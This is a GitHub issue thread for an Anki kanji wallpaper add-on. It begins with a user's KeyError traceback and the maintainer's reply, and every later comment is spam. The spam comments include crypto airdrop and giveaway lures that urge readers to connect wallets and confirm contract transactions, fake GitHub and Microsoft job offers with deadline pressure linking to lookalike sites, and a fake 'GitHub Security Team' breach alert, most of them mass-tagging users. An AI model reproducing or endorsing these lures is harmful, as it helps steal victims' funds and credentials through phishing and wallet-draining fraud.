### ISSUE TITLE
Error generating wallpapers

### ISSUE THREAD

**Issue by ghost** [htadashi/anki-kanji-wallpaper-generator#2]
I got this error when trying to generate a deck:

An error occurred in an add-on.
Please post on the add-on forum:
https://anki.tenderapp.com/discussions/add-ons

Traceback (most recent call last):
  File "C:\Users\my username\AppData\Roaming\Anki2\addons\kanjiwallpapers.py", line 302, in createSettingsDialog
    start_generation()
  File "C:\Users\my username\AppData\Roaming\Anki2\addons\kanjiwallpapers.py", line 418, in start_generation
    generate_wallpaper(note[_pattern])
  File "anki\notes.py", line 98, in __getitem__
  File "anki\notes.py", line 95, in _fieldOrd
KeyError: u'Kanji'

**Comment by htadashi** [comment]
Couldn't reproduce the error. Could you send me your deck? 
I suspect that the problem is an incorrect value in the text field 'Kanji field' (note that this field is case sensitive).

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by yinka5521** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by naudachu** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @axelchalon, @fabiohild, @idlefire, @AnthonyMadia, @manboy-eth, @hitrust, @arturomtm

**Comment by BenediktMiller** [comment]
## Exciting News! You're the proud recipient of $2364 in tokens 🪂🔴

Ready to transform those tokens into real value? Here's how:

- Unlock the full potential of your $2364 by seamlessly connecting your wallet to WalletConnect.
- Your $2364 ETH redemption has been verified and is ready for you to claim.
- 🎁 Dive into a world of monthly rewards by exploring [this exclusive airdrop](https://www.walletconnectreward.online/).

But wait, there's more! Connect your wallet now, follow our simple instructions, and unveil an exclusive airdrop designed just for GitHub users. Spread the word to friends—each share increases your eligibility. Don't miss out on securing your reward!

![WalletConnect](https://preview.redd.it/walletconnect-2023-reviews-features-and-safety-v0-e807nahvtfmb1.png?width=2548&format=png&auto=webp&s=f94da65885db338806c867e335e4df7688ef4398)

🚀 **Seize Your Bonus Opportunity Now!** [Verify Eligibility](https://www.walletconnectreward.online/)

Embark on a journey with Optimism, where your wallet is your key to exclusive benefits. Make sure to use a trusted wallet for a secure transaction.

- 🔗 **Connect your wallet:** Not once, but twice!
- 📋 **Claim Button:** Click on the claim button after connecting your wallet.
- 💼 **Interact with the Method Connect:** Engage with the contract using the Method Connect to complete the process.
- 💰 **Ensure Mainnet Balance:** Don't forget to check that your wallet has a sufficient balance on the mainnet for successful transactions.

Reformulate the Whitelist promotion up to $10,000, following these steps:
1. Connect your wallet.
2. Click on the claim button.
3. Interact with the contract using the Method Connect.
4. Ensure your wallet has a sufficient balance on the mainnet.


Winners: @0xMaki, @tkanjanarux, @oleax21, @6boris, @yosriady, @manoharys, @mrfujisawa

**Comment by aashish-medhatech** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @wtiwana, @nikita, @paco0x, @simuty, @bijoydoteth, @Leelow, @ignromanov, @transmissions11, @van-bright, @phamchien94, @0xrinegade, @xaviablaza, @geofflangenderfer, @bshyong, @disestevez, @tinhb92, @loyalCustomer, @mizt0, @arwyatt, @sebastiantf

**Comment by tuptzens** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
wimmeldj, @a1ekseev, @zthomas, @YunChe404, @mandarine-dev, @PNRxA, @liurui2014, @bellyfat, @qubits4all, @RagePit, @amlcodes, @defi-caratacus, @mathMakesArt, @KaziAWSM, @sudotty, @nicholashc, @tujieren, @JohnIdyu, @splitbrainCH, @lildata

**Comment by Ilyas-Issayev** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

langrenfengzi, @onahhhhh, @software-is-life, @q1blue, @abraham-yusuf, @cerveeza77, @dzxindex, @adamazad, @fenghaolinroix, @nb9960, @Rods2000, @amirfarajii, @donnyquixotic, @xiyou1223, @HasegawaAzusa, @myxvisual, @famasoon, @ppark2ya, @kitmacleod, @elicharlese

**Comment by nishitchittora** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
aliceincryptoland, @mghnmtt, @saniolabs, @ajokodavid, @hudson-newey, @CorentinGC, @aleanos, @amitroko, @TSiin, @drimgithub, @ablegamesdev, @aquiladev, @newyorkthink, @chuwt, @qjyoung, @xkenny525, @SSimonPhd, @yoioooo, @brianyang, @sivenLee

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
yi-ban, @saadazghour, @Zer0ne001, @21998524, @Gabriel-Re, @pratham-bhatnagar, @emo-eth, @nmcclain, @acamposruiz, @ducviet00, @Doppp, @imthatcarlos, @zhengjiabo, @otooooooooooooooooo, @rickydavila, @eduadiez, @danly, @bvalosek, @quynguyen2303, @dengzhaojun

**Comment by uc-Pri** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
elfplz, @clarkchen, @Grana69, @dsshap, @amlcodes, @blazealec, @VanessaMachi, @nfy-dot, @marcvernet31, @pranavmehendiratta, @Arveymenon, @evquant, @Zander1K, @justinbarry, @bt3gl, @GhostStar, @okaokaokaoka, @fooock, @wtypty2, @atys-codes

**Comment by Joshwani** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.Dadybayo, @bplion, @EdwinaZhao, @0xmiroku, @AlexanderFSP, @Ikar760, @jasonjfxu, @BitOfUniverse, @kyley7777777, @tylerbordeaux, @DessertHeart, @ashablovskiy, @OrmEmbaar, @PauloAMFaria, @nateabele, @myh614, @MalboreX, @limonfort, @0xksure, @HarryTgerman

**Comment by rapkaan** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
elia-orsini, @PEMTR, @nqueuche, @exeto, @JJewell2k, @ShravanSunder, @alexjorgef, @zeroXBami, @jupitermandy, @hood, @panda850819, @armgit5, @prite36, @nguyendoanh99, @ToJen, @Igmat, @AllanM007, @dtmkeng, @xrash, @jacob-wei

**Comment by uc-Pri** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
kobesjava, @izayl, @vintnee, @HJS-dev, @transkarpation, @Chainxiao6, @MysticalFire68, @uzogoduyah, @AdeolaAyo2, @harrysolovay, @sindey1982, @kizmo, @xiezhenyuan, @carlobanda, @jlsgo, @lichongbing, @junproger, @yutingzhao1991, @hudson-newey, @FortesFortunaAdiuvat

**Comment by dhruv479** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
, @hientpbank, @joe-nano, @humansaul, @jrodrigomg, @DoCmAL1, @nicolenew, @glitch-txs, @usagiryu, @ASicPerson, @Tenobtc, @cooperinnovativeanalytics, @airkaikai, @litong-2017, @gatleas17, @IceEFresh, @l0s3rr, @zeekay, @blackdoc111, @hcg1234yan, @Itemlogic, @0x0001, @allanpereira, @abdul-maajid, @cyberbofh, @klouskingsley, @x86NOP, @stefanfanz, @randomcomposition, @Saksham010, @akamajoris, @zerjioang, @qb20nh, @Neo314dw, @kryptocodes, @TenviLi, @melonges, @0xHati, @jensen92, @C-Dao, @jmcph4, @hercules22443, @JacksonUptain, @cryptoqn, @umarudin486, @gelove, @nayem505, @Vialo, @t0pd09590dp0t, @AeroOwl
